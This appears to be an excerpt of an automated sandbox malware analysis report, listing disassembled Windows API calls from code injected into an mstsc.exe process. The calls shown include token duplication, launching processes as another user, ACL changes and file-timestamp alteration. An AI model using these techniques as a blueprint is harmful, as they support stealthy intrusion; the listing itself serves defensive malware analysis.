      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
      • Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
      • Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
      • Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
      • Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
      • Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
      • Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
      • Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6
    • GetProcessHeap.KERNEL32(00000008,0000000C), ref: 000672E6
    • HeapAlloc.KERNEL32(00000000), ref: 000672ED
    • GetCurrentProcessId.KERNEL32 ref: 00067300
    • CreateThread.KERNEL32(00000000,00000000,Function_00006C88,00000000,00000000,00000000), ref: 00067311
    • CloseHandle.KERNEL32(00000000), ref: 00067318
    • CreateThread.KERNEL32(00000000,00000000,Function_000070D8,00000000,00000000,00000000), ref: 00067368
    • CloseHandle.KERNEL32(00000000), ref: 0006736F
      • Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000008,0000000B,?,00000000,00106D80), ref: 0006E140
      • Part of subcall function 0006E0EF: HeapAlloc.KERNEL32(00000000), ref: 0006E143
      • Part of subcall function 0006E0EF: GetShellWindow.USER32 ref: 0006E155
      • Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000008,0000001A), ref: 0006E1BD
      • Part of subcall function 0006E0EF: HeapAlloc.KERNEL32(00000000), ref: 0006E1C0
      • Part of subcall function 0006E0EF: ReleaseCapture.USER32 ref: 0006E1D4
      • Part of subcall function 0006E0EF: LoadLibraryA.KERNEL32(?), ref: 0006E1FE
      • Part of subcall function 0006E0EF: GetProcAddress.KERNEL32(00000000), ref: 0006E205
      • Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006E219
      • Part of subcall function 0006E0EF: HeapFree.KERNEL32(00000000), ref: 0006E222
      • Part of subcall function 0006E0EF: GetProcessHeap.KERNEL32(00000000,?), ref: 0006E227
      • Part of subcall function 0006E0EF: HeapFree.KERNEL32(00000000), ref: 0006E22A
      • Part of subcall function 0006E0EF: NtQuerySystemInformation.NTDLL(00000005,00000000,00000000,7142434B,?,00000000,00106D80), ref: 0006E240
      • Part of subcall function 0006E0EF: VirtualAlloc.KERNELBASE(00000000,7142424B,00003000,00000004), ref: 0006E261
      • Part of subcall function 0006E0EF: NtQuerySystemInformation.NTDLL(00000005,00000000,7142434B,00000000), ref: 0006E276
      • Part of subcall function 0006E0EF: VirtualFree.KERNEL32(?,00000000,00008000), ref: 0006E2E1
    • Sleep.KERNEL32(000003E8), ref: 0006739E
    • Sleep.KERNEL32(0000001E), ref: 000673A2
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
      • Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
      • Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1
    • CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
    • GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
    • GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
    • HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
    • GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
    • CloseHandle.KERNEL32(00000000), ref: 0006DA99
    • GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
    • HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
    • GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
    • HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 00066C0B: wsprintfW.USER32 ref: 00066C4D
      • Part of subcall function 00066C0B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00066C6B
      • Part of subcall function 00066C0B: CloseHandle.KERNEL32(00000000), ref: 00066C7A
    • ExitThread.KERNEL32 ref: 00066F17
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
      • Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
      • Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
      • Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
      • Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
      • Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
      • Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
      • Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00066E91
    • GetExitCodeProcess.KERNEL32(?), ref: 00066EA6
    • Sleep.KERNEL32(00001388), ref: 00066EB1
    • TerminateProcess.KERNEL32(00000000), ref: 00066EBE
    • CreateThread.KERNEL32(00000000,00000000,00066E18,?,00000000,00000000), ref: 00066ECE
    • CloseHandle.KERNEL32(00000000), ref: 00066EDB
    • CloseHandle.KERNEL32 ref: 00066EE3
    • FindAtomW.KERNEL32(?), ref: 00066F06
    • DeleteAtom.KERNEL32(?), ref: 00066F10
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,00000208,00000000,?,00000000,000677F1,00000000,?), ref: 000686D1
    • HeapAlloc.KERNEL32(00000000), ref: 000686D8
    • GetModuleFileNameW.KERNEL32(00000104,00000000,00000104), ref: 000686EC
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006870B
    • HeapFree.KERNEL32(00000000), ref: 0006870E
    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0006871A
    • HeapAlloc.KERNEL32(00000000), ref: 0006871D
    • GetLastError.KERNEL32 ref: 0006873B
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00068746
    • HeapFree.KERNEL32(00000000), ref: 0006874D
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetProcessHeap.KERNEL32(00000008,0000006D,?,00000000,00000000), ref: 0006A6B0
    • HeapAlloc.KERNEL32(00000000), ref: 0006A6B3
    • GetCurrentThreadId.KERNEL32 ref: 0006A6C5
      • Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000008,0000000A,00000001,00000000,76E6FE8D), ref: 0006A50C
      • Part of subcall function 0006A4DC: HeapAlloc.KERNEL32(00000000), ref: 0006A50F
      • Part of subcall function 0006A4DC: GetMessagePos.USER32 ref: 0006A52A
      • Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000008,00000013), ref: 0006A593
      • Part of subcall function 0006A4DC: HeapAlloc.KERNEL32(00000000), ref: 0006A596
      • Part of subcall function 0006A4DC: GetCurrentThreadId.KERNEL32 ref: 0006A5AA
      • Part of subcall function 0006A4DC: LoadLibraryA.KERNEL32(?), ref: 0006A5D4
      • Part of subcall function 0006A4DC: GetProcAddress.KERNEL32(00000000), ref: 0006A5DB
      • Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A5EF
      • Part of subcall function 0006A4DC: HeapFree.KERNEL32(00000000), ref: 0006A5F2
      • Part of subcall function 0006A4DC: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A614
      • Part of subcall function 0006A4DC: HeapFree.KERNEL32(00000000), ref: 0006A617
    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0006A717
    • HeapAlloc.KERNEL32(00000000), ref: 0006A71A
    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006A766
    • HeapFree.KERNEL32(00000000), ref: 0006A76D
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 000667FB: GetProcessHeap.KERNEL32(00000008,00000089), ref: 000668BE
      • Part of subcall function 000667FB: HeapAlloc.KERNEL32(00000000), ref: 000668C5
      • Part of subcall function 000667FB: CountClipboardFormats.USER32 ref: 000668D6
      • Part of subcall function 000667FB: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 0006690F
      • Part of subcall function 000667FB: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 00066934
      • Part of subcall function 000667FB: CloseHandle.KERNEL32(00000000), ref: 00066943
      • Part of subcall function 000667FB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0006694E
      • Part of subcall function 000667FB: HeapFree.KERNEL32(00000000), ref: 00066955
    • ExitThread.KERNEL32 ref: 00066E11
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006487E
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064881
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0006489A
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006489D
      • Part of subcall function 0006485C: OpenProcess.KERNEL32(00000400,00000000), ref: 000648D1
      • Part of subcall function 0006485C: OpenProcessToken.ADVAPI32(00000000,00020008,00000000), ref: 00064907
      • Part of subcall function 0006485C: ProcessIdToSessionId.KERNEL32(?,?), ref: 00064921
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,00000000,?), ref: 00064942
      • Part of subcall function 0006485C: GetLastError.KERNEL32 ref: 00064944
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,?), ref: 00064958
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 0006495B
      • Part of subcall function 0006485C: GetTokenInformation.ADVAPI32(00000000,00000001,00000000,?,?), ref: 00064979
      • Part of subcall function 0006485C: LookupAccountSidW.ADVAPI32(00000000,?,?,00000104,?,00000104,?), ref: 0006499D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00064A0C
      • Part of subcall function 0006485C: HeapAlloc.KERNEL32(00000000), ref: 00064A0F
      • Part of subcall function 0006485C: GetCursor.USER32 ref: 00064A20
      • Part of subcall function 0006485C: wsprintfW.USER32 ref: 00064A53
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064A6C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A75
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A7C
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A7F
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(00000000), ref: 00064A84
      • Part of subcall function 0006485C: CloseHandle.KERNEL32(?), ref: 00064A8D
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,?), ref: 00064A9B
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064A9E
      • Part of subcall function 0006485C: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064AA3
      • Part of subcall function 0006485C: HeapFree.KERNEL32(00000000), ref: 00064AA6
      • Part of subcall function 000664D2: OpenProcess.KERNEL32(02000000,00000000), ref: 00066529
      • Part of subcall function 000664D2: ProcessIdToSessionId.KERNEL32(?,?), ref: 00066541
      • Part of subcall function 000664D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 0006655F
      • Part of subcall function 000664D2: DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?), ref: 00066586
      • Part of subcall function 000664D2: SetTokenInformation.ADVAPI32(?,0000000C,?,00000004,?,?), ref: 000665A6
      • Part of subcall function 000664D2: AllocateAndInitializeSid.ADVAPI32(?,00000001,00004000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 000665C0
      • Part of subcall function 000664D2: GetLengthSid.ADVAPI32(?,?,?), ref: 000665D8
      • Part of subcall function 000664D2: SetTokenInformation.ADVAPI32(?,0000001B,00000000,00000004,?,?), ref: 00066604
      • Part of subcall function 000664D2: CreateEnvironmentBlock.USERENV(?,?,00000001,?,?), ref: 0006660F
      • Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000008,00000041,?,?), ref: 00066679
      • Part of subcall function 000664D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00066680
      • Part of subcall function 000664D2: GetCaretBlinkTime.USER32 ref: 0006669C
      • Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000008,00000031,?,?), ref: 000666FF
      • Part of subcall function 000664D2: HeapAlloc.KERNEL32(00000000,?,?), ref: 00066706
      • Part of subcall function 000664D2: CreatePopupMenu.USER32 ref: 0006671A
      • Part of subcall function 000664D2: CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?,?,?), ref: 00066777
      • Part of subcall function 000664D2: OpenProcessToken.ADVAPI32(00000000,000201EB,?,?,?), ref: 00066793
      • Part of subcall function 000664D2: CloseHandle.KERNEL32(?), ref: 000667A8
      • Part of subcall function 000664D2: CloseHandle.KERNEL32(00007479), ref: 000667B0
      • Part of subcall function 000664D2: DestroyEnvironmentBlock.USERENV(00000000,?,?), ref: 000667BB
      • Part of subcall function 000664D2: CloseHandle.KERNEL32(?), ref: 000667C4
      • Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 000667C9
      • Part of subcall function 000664D2: HeapFree.KERNEL32(00000000,?,?), ref: 000667D6
      • Part of subcall function 000664D2: GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 000667DB
      • Part of subcall function 000664D2: HeapFree.KERNEL32(00000000,?,?), ref: 000667E2
      • Part of subcall function 000664D2: CloseHandle.KERNEL32(?), ref: 000667ED
      • Part of subcall function 000664D2: CloseHandle.KERNEL32(00000000), ref: 000667F0
      • Part of subcall function 0006D9F1: CreateFileW.KERNEL32(00106D80,80000000,00000001,00000000,00000003,00000080,00000000), ref: 0006DA1F
      • Part of subcall function 0006D9F1: GetFileSize.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA2E
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000008,00000002,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA47
      • Part of subcall function 0006D9F1: HeapAlloc.KERNEL32(00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA4E
      • Part of subcall function 0006D9F1: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0006DA63
      • Part of subcall function 0006D9F1: GetLastError.KERNEL32(?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DA8B
      • Part of subcall function 0006D9F1: CloseHandle.KERNEL32(00000000), ref: 0006DA99
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,00000000,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAB0
      • Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DAB7
      • Part of subcall function 0006D9F1: GetProcessHeap.KERNEL32(00000000,?,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006DAC3
      • Part of subcall function 0006D9F1: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006DACA
    • CloseHandle.KERNEL32 ref: 00066DDB
      • Part of subcall function 0006D768: GetProcessHeap.KERNEL32(00000008,00000061,?,00000000,00000000), ref: 0006D7EF
      • Part of subcall function 0006D768: HeapAlloc.KERNEL32(00000000,?,00000000,00000000), ref: 0006D7F2
      • Part of subcall function 0006D768: GetShellWindow.USER32 ref: 0006D803
      • Part of subcall function 0006D768: CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,00000208,00000000,?,00000000,00000000), ref: 0006D83D
      • Part of subcall function 0006D768: MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000208,?,00000000,00000000), ref: 0006D86B
      • Part of subcall function 0006D768: CloseHandle.KERNEL32 ref: 0006D880
      • Part of subcall function 0006D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D88E
      • Part of subcall function 0006D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D891
      • Part of subcall function 0006D768: StrCpyW.SHLWAPI(00000000,?,?,00000000,00000000), ref: 0006D89F
      • Part of subcall function 0006D768: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0006D8A7
      • Part of subcall function 0006D768: HeapFree.KERNEL32(00000000,?,00000000), ref: 0006D8AA
      • Part of subcall function 00069240: GetVersion.KERNEL32(?,00000000,00000000), ref: 00069263
      • Part of subcall function 00069240: CloseHandle.KERNEL32(00000000), ref: 000693F9
    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00066D9C
    • Sleep.KERNEL32(00001388), ref: 00066DA7
    • TerminateProcess.KERNEL32(00000000), ref: 00066DB4
    • CreateThread.KERNEL32(00000000,00000000,00066C88,?,00000000,00000000), ref: 00066DC6
    • CloseHandle.KERNEL32(00000000), ref: 00066DD3
    • FindAtomW.KERNEL32(?), ref: 00066E00
    • DeleteAtom.KERNEL32(?), ref: 00066E0A
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • AllocateAndInitializeSid.ADVAPI32(?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?), ref: 0006D8EA
    • SetEntriesInAclW.ADVAPI32(00000001,000000FF,00000000,?), ref: 0006D920
    • LocalAlloc.KERNEL32(00000040,00000014), ref: 0006D92A
    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 0006D934
    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 0006D941
    • SetFileSecurityW.ADVAPI32(?,00000004,00000000), ref: 0006D94B
    • FreeSid.ADVAPI32(00000000), ref: 0006D95A
    • LocalFree.KERNEL32(00000000), ref: 0006D96F
    • LocalFree.KERNEL32(00000000), ref: 0006D976
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,00000000,00106D80,00106D80,00106D80,00106D80,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D991
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000008,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x), ref: 0006D9AB
      • Part of subcall function 0006D97F: HeapAlloc.KERNEL32(00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9B2
      • Part of subcall function 0006D97F: ExpandEnvironmentStringsW.KERNEL32(00106D80,00000000,7142434B,00000000,?,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?), ref: 0006D9CD
      • Part of subcall function 0006D97F: GetProcessHeap.KERNEL32(00000000,00000000,0006DA06,00072000,7142434B,00106D80,?,00061ADF,?,?,?,?,?,?,KCBqiNhR7x,0006F467), ref: 0006D9DA
      • Part of subcall function 0006D97F: HeapFree.KERNEL32(00000000,?,00061ADF), ref: 0006D9E1
    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0006DD37
    • GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD44
      • Part of subcall function 0006DAD5: GetSystemTime.KERNEL32(?,00000000,?,00000000), ref: 0006DAF2
      • Part of subcall function 0006DAD5: SystemTimeToFileTime.KERNEL32(?,?,0000003B), ref: 0006DBA6
      • Part of subcall function 0006DAD5: SystemTimeToFileTime.KERNEL32(?,?), ref: 0006DBAD
      • Part of subcall function 0006DAD5: SystemTimeToFileTime.KERNEL32(?,00000016), ref: 0006DBB6
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 0006DD6B
    • SetEndOfFile.KERNEL32(00000000,?,?,?,?,00061970,?), ref: 0006DD76
    • GetLastError.KERNEL32(?,?,?,?,00061970,?), ref: 0006DD80
    • SetFileTime.KERNEL32(00000000,?,?,?,?,?,?,?,00061970,?), ref: 0006DD95
    • CloseHandle.KERNEL32(00000000), ref: 0006DD9C
    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00061970,?), ref: 0006DDA9
    • HeapFree.KERNEL32(00000000), ref: 0006DDB0
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • GetModuleHandleA.KERNEL32(?,?), ref: 0006E6BD
    • GetProcAddress.KERNEL32(00000000), ref: 0006E6C4
    Strings
    Memory Dump Source
    • Source File: 0000000D.00000002.2146766360.00060000.00000040.sdmp, Offset: 00060000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_13_2_60000_mstsc.jbxd
    APIs
    • WSAStartup.WS2_32(00000201,?), ref: 00063419
      • Part of subcall function 00064521: GetModuleHandleW.KERNEL32(00000000,7142434B,00106D80,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006453A
      • Part of subcall function 00064521: GetCurrentProcess.KERNEL32(00000008,000619F5,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064546
      • Part of subcall function 00064521: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 0006454D
      • Part of subcall function 00064521: GetTokenInformation.KERNELBASE(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 00064570
      • Part of subcall function 00064521: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064572
      • Part of subcall function 00064521: GlobalAlloc.KERNEL32(00000040,76E6FE8D,?,?,?,?,?,?,?,?,?,?,?,000619F5,76AD46E9,76E6FE8D), ref: 00064587
      • Part of subcall function 00064521: GetTokenInformation.ADVAPI32(000619F5,00000001,00000000,76E6FE8D,76E6FE8D,?,?,?,?,?,?,?,?,?,?,000619F5), ref: 000645A7
      • Part of subcall function 00064521: ConvertSidToStringSidW.ADVAPI32(00000000,76AD46E9), ref: 000645B7
      • Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000008,00000025), ref: 00064601
      • Part of subcall function 00064521: HeapAlloc.KERNEL32(00000000), ref: 00064608
      • Part of subcall function 00064521: GetCapture.USER32 ref: 00064617
      • Part of subcall function 00064521: StrCmpIW.SHLWAPI(00000000,76AD46E9), ref: 00064647
      • Part of subcall function 00064521: LocalFree.KERNEL32(76AD46E9), ref: 0006465B
      • Part of subcall function 00064521: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00064664
      • Part of subcall function 00064521: HeapFree.KERNEL32(00000000), ref: 0006466B
      • Part of subcall function 00064521: GlobalFree.KERNEL32(00000000), ref: 00064675
      • Part of subcall function 00064521: CloseHandle.KERNEL32(000619F5), ref: 0006467F
    • SetEvent.KERNEL32 ref: 00063443
    • ExitThread.KERNEL32 ref: 0006344B
      • Part of subcall function 00063E17: GetProcessHeap.KERNEL32(00000008,00000208,0007CAA8), ref: 00063E3F
